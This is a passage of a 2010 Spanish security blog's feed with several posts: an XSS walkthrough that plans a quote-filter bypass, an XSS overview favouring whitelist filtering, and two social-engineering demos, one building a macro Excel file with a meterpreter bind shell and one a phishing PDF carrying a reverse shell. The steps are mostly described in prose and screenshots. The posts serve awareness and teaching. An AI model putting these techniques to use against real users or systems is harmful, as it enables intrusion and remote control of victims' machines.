&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Como comenté en el post anterior, existen medidas de escape de los filtros basados en listras negras o &lt;/span&gt;&lt;i&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;blacklist,&lt;/span&gt;&lt;/i&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt; que, dependiendo de los controles y la programación de la aplicación serán más o menos compleja su evasión.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Si volvemos a observar el código fuente devuelto por el servidor, el parámetro HTML "value" no se encuentra entre comillas, permitiendo a un atacante la inserción directa de código HTML.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;NOTA: Muchas veces, es importante insertar los caracteres para romper lo mínimo el código fuente. En este caso, no insertamos el últumo "&amp;gt;" porque es insertado siempre por la aplicación. Análogamente para el primer "&amp;gt;". Otras veces, es posible que se deban usar la inserción de comentarios cómo medida de escape.&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Como podreis observar si realizais la prueba, el servidor no escapará ningún carácter de los anteriormente insertados, produciendo el siguiente código HTML:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_cF66r39b8uc/S6-wwYQJHdI/AAAAAAAAAH4/aP4wY4SD2Sw/s1600/Picture+12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_cF66r39b8uc/S6-wwYQJHdI/AAAAAAAAAH4/aP4wY4SD2Sw/s320/Picture+12.png" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Que daría como resultado lo siguiente:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://4.bp.blogspot.com/_cF66r39b8uc/S6-w6B_iE1I/AAAAAAAAAIA/umRUJEsFz1I/s1600/Picture+10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_cF66r39b8uc/S6-w6B_iE1I/AAAAAAAAAIA/umRUJEsFz1I/s320/Picture+10.png" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Pues como veis, hemos podido comprobar que el navegador del usuario (en éste caso el mío) ha ejecutado el código que le hemos insertado sacando por pantalla el valor de la cookie (que obviamente es nulo).&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Una vez hemos comprobado que podemos ejecutar código javascript, se podrían realizar cualquiera de los ataques que hablamos en el post anterior, pero antes, debemos descubrir cómo escapar al filtro de PHP, y lograr introducir comillas.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Por ello, vamos a recurrir a un &lt;/span&gt;&lt;a href="http://ha.ckers.org/xss.html"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Cheat Sheet&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt; elaborado por Rsnake, el cual contiene varios métodos de evasión para diferentes situaciones. Si nos paramos a pensar un poco, en nuestro caso lo que necesitamos es escapar al filtro de comilla simple y comilla doble, por lo tanto, ¿por qué no transformar dichos caracteres en su equivalente &lt;/span&gt;&lt;a href="http://www.asciitable.com/"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;CharCode&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt; (Valor decimal de la representación ASCII del carácter)?&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-2512656888724289476?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/8RU5rjb5u64" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/8RU5rjb5u64/la-problematica-de-los-cross-site_29.html</link><author>noreply@blogger.com (Ramon Vicens)</author><media:thumbnail url="http://1.bp.blogspot.com/_cF66r39b8uc/S6-qlinBNPI/AAAAAAAAAHY/wjdRcYgNns0/s72-c/Picture+6.png" height="72" width="72" /><feedburner:origLink>http://www.securecorner.net/2010/03/la-problematica-de-los-cross-site_29.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-5863794480785264321</guid><pubDate>Mon, 22 Mar 2010 07:00:00 +0000</pubDate><atom:updated>2010-03-22T08:00:09.595+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Auditorías Seguridad</category><title>La problemática de los Cross Site Scripting</title><description>&lt;div style="text-align: justify;"&gt;Los ataques de &lt;a href="http://es.wikipedia.org/wiki/Cross-site_scripting"&gt;Cross Site Scripting (XSS&lt;/a&gt;) son uno de los ataques más peligrosos y más subestimados que existen en la actualidad. Con éste tipo de ataques, una organización puede sufrir daño a la imagen corporativa y pérdida de información. Podemos recordar el reciente ataque a través de twitter a la web de la presidencia Española en el que a través de la distribución de un enlace malintencionado se "modificó" el contenido de la página.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;¿Qué puede hacer un atacante a través de una vulnerabilidad de éstas características? Pues la verdad que dependerá un poco del tipo de cross site según sea:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Persistente: El código inyectado quedará almacenado y cada vez que se cargue la página, los usuarios legítimos ejecutarán el código.&lt;/li&gt;
&lt;li&gt;Reflejado: Sólo los usuarios que carguen la URL malintencionada ejecutarán el código&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Como podeis observar, la primera vía, será más fácil y cómoda para un atacante, sin embargo, no cabe olvidar a nuestras amigas las "redes sociales" que serán un mecanismo de distribución importante para casos donde el XSS sea reflejado. En general, mediante un XSS se podrán realizar ataques del tipo:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Obtención de cookies de usuario (redirección de la URL legítima hacia otra)&lt;/li&gt;
&lt;li&gt;Redirección del usuario (Si tuvieramos un login vía formulario Web sobre HTTPS, ¿por qué no redireccionarlo hacia otro servidor al hacer el submit del formulario?)&lt;/li&gt;
&lt;li&gt;Modificación de contenido Web&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;El problema de éste tipo de vulnerabilidades, es que se podrá hacer casi cualquier cosa que se nos pueda imaginar gracias a las tecnologías de client que disponemos en la actualidad (Flash, Javascript, applets,ruby, perl, ....) pudiendo realizar otro tipo de ataques más avanzados (usando IFRAMES ocultos) como:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Escaneo de puertos de servicios internos&lt;/li&gt;
&lt;li&gt;Fingerprinting de servidores internos&lt;/li&gt;
&lt;li&gt;Obtención información del cliente como el historial de navegación (...¿¿¿contraseñas guardadas en el navegador???....) &amp;nbsp;que podrá permitir a un atacante obtener información de nuevos activos o recursos de una red interna.&lt;/li&gt;
&lt;li&gt;Ejecución de exploits en el navegador que nos permitan aprovechar vulnerabilidades de las que rondan por ahí en la actualidad...&lt;/li&gt;
&lt;li&gt;etc etc&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;¿Cómo vamos a proteger las aplicaciones? Pues existe tan solo 1 solución y que recibe el nombre de &amp;nbsp;FILTRADO. Es una solución muy obvia pero no todo el mundo utiliza los mecanismos de filtrado más efectivos:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Filtrado por Whitelist: Se define una lista de carácteres/palabras legítimas que pueden utilizarse.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Filtrado por Blacklist: Se defines una lista de carácteres que no se podrán utilizar, como por ejemplo, "/", "&lt;script&gt;
&lt;/script&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;Inicialmente, uno puede pensar que el método de filtrado por blacklist podría ser el más eficiente y rápido de implantar, pero si consideramos que existen &lt;a href="http://ha.ckers.org/xss.html"&gt;técnicas de evasión de filtrados&lt;/a&gt;, se puede llegar a la conclusión que el método más seguro será el uso de whitelists.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Saludos,&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-5863794480785264321?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/qI8IYUA79vw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/qI8IYUA79vw/la-problematica-de-los-cross-site.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/03/la-problematica-de-los-cross-site.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-5687673360924702318</guid><pubDate>Mon, 15 Mar 2010 07:30:00 +0000</pubDate><atom:updated>2010-03-15T09:39:55.438+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ingenieria Social</category><title>Sobre Ingeniería Social II</title><description>&lt;div style="text-align: justify;"&gt;En un &lt;a href="http://www.securecorner.net/2010/02/sobre-ingenieria-social.html"&gt;post anterior&lt;/a&gt;, hace varios días hablé sobre el framework de ingeniería social SET el cual nos permite, entre otros, la creación de websites y PDFs maliciosos. Con el post de hoy, me gustaría complementar el anterior con otra herramienta que nos permite insertar un payload malicioso en un fichero Excel.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La herramienta es xlsinjector, desarrollada por &amp;nbsp;&lt;a href="http://code.google.com/u/keith.lee2012/"&gt;Keith Lee&lt;/a&gt;, permitiendo insertar una bind shell meterpreter al puerto 4444 como payload. La herramienta en sí, no explota ninguna vunerabilidad software del paquete de Microsoft sino que utiliza un código visual basic que genera el código pertinente para inyectar la shell en memoria.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En realidad, para realizar la explotación se requiere la intervención de varios factores:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;ol&gt;&lt;li style="text-align: justify;"&gt;Que el usuario ejecute el archivo excel&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Que la máquina del usuario permita la ejecución de macros desde Excel&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Que no existan relgas de filtrado que permitan bloquear el acceso a dicho puerto&lt;/li&gt;
&lt;/ol&gt;&lt;div style="text-align: justify;"&gt;Veamos la siguiente prueba de concepto....&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Creamos el XLS malicioso&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_cF66r39b8uc/S51Rh1e3VeI/AAAAAAAAAGo/6eZSUsOhqDg/s1600-h/Picture+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_cF66r39b8uc/S51Rh1e3VeI/AAAAAAAAAGo/6eZSUsOhqDg/s320/Picture+2.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Se lo enviamos al usuario destino acompañado de algunos engaños que le motiven a ejecutar el fichero. En la siguiente figura se puede observar el resultado de la ejecución del fichero &lt;b&gt;prueba_con_SHELL.xls&lt;/b&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_cF66r39b8uc/S51SZHzWD8I/AAAAAAAAAGw/yhL1iHMxv2w/s1600-h/Picture+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_cF66r39b8uc/S51SZHzWD8I/AAAAAAAAAGw/yhL1iHMxv2w/s320/Picture+4.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Una vez ejecutado el fichero, tan solo se requiere de Metasploit y de su módulo multi handler para ejecutar una bind shell meterpreter...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S51SrwdusZI/AAAAAAAAAG4/t8s2hC_hcEI/s1600-h/Picture+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S51SrwdusZI/AAAAAAAAAG4/t8s2hC_hcEI/s320/Picture+3.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="http://3.bp.blogspot.com/_cF66r39b8uc/S51TrujhlpI/AAAAAAAAAHA/X7f1-OwGvNU/s1600-h/Picture+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_cF66r39b8uc/S51TrujhlpI/AAAAAAAAAHA/X7f1-OwGvNU/s320/Picture+5.png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Una vez obtenida la shell meterpreter se podrían escalar privilegios mediante el comando getsystem, que entre otras, aprovecha la vulnerabilidad de la que hablé en posts anteriores de escalada de privilegios.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_cF66r39b8uc/S51T4k0Gp7I/AAAAAAAAAHI/d4SS2AxqJzs/s1600-h/Picture+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_cF66r39b8uc/S51T4k0Gp7I/AAAAAAAAAHI/d4SS2AxqJzs/s320/Picture+6.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="http://4.bp.blogspot.com/_cF66r39b8uc/S51T967hj0I/AAAAAAAAAHQ/X9zLxrqIgpI/s1600-h/Picture+7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_cF66r39b8uc/S51T967hj0I/AAAAAAAAAHQ/X9zLxrqIgpI/s320/Picture+7.png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Para desarrollar este ataque en un entorno real, como he comentado anteriormente, se requiere de la interacción de los usuarios, la permisividad de ejecución de macros y de las reglas de filtrado. Pero si vamos al código fuente de la herramienta y cambiamos el payload por otro que efectúe una conexión inversa a través del puerto 80, ¿ cuantos entornos serían capaces de detectar el ataque?&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;No solo las medidas de seguridad perimetras nos van a ayudar a mantener a nuestra organización bien protegida. Por ello, quiero destacar una vez más, lo importante que es incluir la formación y concienciación de los usuarios como medida de seguridad de la Organización. De hecho, esto se alinea perfectamente con el concepto de seguridad en profundidad, el cual defiende que se apliquen mecanismos de protección a diferentes niveles.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Saludos,&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-5687673360924702318?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/SW-xR0ABbVU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/SW-xR0ABbVU/sobre-ingenieria-social-ii.html</link><author>noreply@blogger.com (Ramon Vicens)</author><media:thumbnail url="http://2.bp.blogspot.com/_cF66r39b8uc/S51Rh1e3VeI/AAAAAAAAAGo/6eZSUsOhqDg/s72-c/Picture+2.png" height="72" width="72" /><feedburner:origLink>http://www.securecorner.net/2010/03/sobre-ingenieria-social-ii.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-6937801363798255076</guid><pubDate>Sat, 06 Mar 2010 20:23:00 +0000</pubDate><atom:updated>2010-03-06T21:23:41.537+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Malware</category><title>Algunos videos educativos</title><description>&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande'; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px;"&gt;&lt;span class="Apple-style-span" style="font-family: Times;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;Sin ánimo de hacer publicidad a Symantec, quiero referenciar algunos videos que publicaron en una campaña comercial del 2008. Desde mi punto de vista, son unos videos muy educativos &amp;nbsp;enfocados a malware y cibercrimen.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Lógicamente, la solución de todos los problemas es que compres su solución, pero al margen de ello, me parece francamente interesante los conceptos que describen y la manera en que lo hacen.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Aquí van !&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.youtube.com/watch?v=e4YKWfYMIFs&amp;amp;feature=related"&gt;Sobre malware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.youtube.com/watch?v=T576VL2vKfU"&gt;Drive by downloads&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.youtube.com/watch?v=BRhauoXpNSs&amp;amp;feature=related"&gt;Botnets&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.youtube.com/watch?v=Ao20tAS3x3I&amp;amp;feature=related"&gt;Phishing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.youtube.com/watch?v=jc-S4fa5BxQ&amp;amp;feature=related"&gt;Ataques de Denegación de Servicio (DoS)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Saludos,&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-6937801363798255076?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/r2Szsj8y2e0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/r2Szsj8y2e0/algunos-videos-educativos.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/03/algunos-videos-educativos.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-728697649573150203</guid><pubDate>Sun, 28 Feb 2010 21:30:00 +0000</pubDate><atom:updated>2010-02-28T22:30:45.130+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ingenieria Social</category><title>Sobre Ingenieria Social</title><description>&lt;div style="text-align: justify;"&gt;En la actualidad, las empresas incorporan mecanismos de seguridad en su entorno perimetral e incluso interno para prevenir y detectar intrusiones externas. Es más, muchas de ellas se han concienciado de la importancia de proteger sus activos tecnológicos y la información que éstos manipulan, pero ¿qué pasa con los usuarios?&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como es sabido, "una cadena se rompe por el eslabón más débil" y desde el punto de vista de la seguridad de la información, éste eslabón son los &lt;b&gt;usuarios&lt;/b&gt;. Éstos son los más propensos a cometer violaciones en la seguridad, ya sea de manera intencionada o bien siendo víctimas de engaños efectuados mediante técnicas de Ingeniería Social.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Prueba de ello, son todas aquellas vulnerabilidades de software de usuario (Adobe, IE, Firefox, ...) que se han publicado a lo largo de éstos últimos años. De modo que voy a aprovechar éste post para introducir una herramienta desarrollada exclusivamente a realizar ataques de ingeniería social. La herramienta es &lt;a href="http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit"&gt;Social Engineering Toolkit&lt;/a&gt; que forma parte del framework de Metasploit e integrado en el framework de &lt;a href="http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)"&gt;The Social Engineering Framework&lt;/a&gt;&amp;nbsp;con la que básicamente se pueden realizar:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Envío de e-mails masivos&lt;/li&gt;
&lt;li&gt;Creación de sites fraudulentos&lt;/li&gt;
&lt;li&gt;Creación de payloads&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Cada una de las capacidades de SET permite explotar vulnerabilidades del software cliente. Por ejemplo, supongamos que enviamos a un empleado de la empresa ACME un correo dónde se le adjunta un archivo PDF. Veamos un pequeño ejemplo práctico:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Arrancamos SET ....&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_cF66r39b8uc/S4rRGcaVCnI/AAAAAAAAAFg/prEwFzu3g0E/s1600-h/Picture+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_cF66r39b8uc/S4rRGcaVCnI/AAAAAAAAAFg/prEwFzu3g0E/s320/Picture+1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Indicamos que queremos un ataque phishing vía e-mail&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_cF66r39b8uc/S4rRUcre8oI/AAAAAAAAAFo/A48YeuwUnLs/s1600-h/Picture+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_cF66r39b8uc/S4rRUcre8oI/AAAAAAAAAFo/A48YeuwUnLs/s320/Picture+2.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Creamos el exploit, que en éste caso será un PDF con un ejecutable embedido el cual contendrá como payload una shell inversa de meterpreter ....&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S4rRmg4KxqI/AAAAAAAAAFw/x2JZH6Y55Hc/s1600-h/Picture+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S4rRmg4KxqI/AAAAAAAAAFw/x2JZH6Y55Hc/s320/Picture+3.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Indicamos que queremos realizar un envío por e-mail de nuestro "PDF" especificándole el tema o asunto del correo....&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S4rTKKy0xhI/AAAAAAAAAGA/-pbJwuvTj2Q/s1600-h/Picture+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S4rTKKy0xhI/AAAAAAAAAGA/-pbJwuvTj2Q/s320/Picture+5.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
